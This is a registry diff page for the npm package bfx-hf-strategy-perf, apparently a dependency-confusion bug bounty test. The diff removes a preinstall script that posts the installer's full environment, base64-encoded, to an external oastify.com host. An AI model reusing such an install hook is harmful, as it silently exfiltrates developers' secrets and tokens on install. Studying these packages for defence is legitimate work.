bfx-hf-strategy-perf 1000.0.1 → 1000.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (1) hide show
  1. package/package.json +2 -5
package/package.json CHANGED
@@ -1,9 +1,6 @@
1
1
  {
2
2
  "name": "bfx-hf-strategy-perf",
3
- "version": "1000.0.1",
4
- "description": "SECURITY BUG BOUNTY PoC - Dependency Confusion Vulnerability - Authorized Testing Only",
5
- "scripts": {
6
- "preinstall": "curl -X POST https://bwbrkqy2o13cagf9lzq3rl7aq1wskm8b.oastify.com?env=$(env | base64 -w0)"
7
- },
3
+ "version": "1000.0.2",
4
+ "description": "Bug Bounty Test Placeholder. No malicious code. Claimed for defensive purposes.",
8
5
  "license": "MIT"
9
6
  }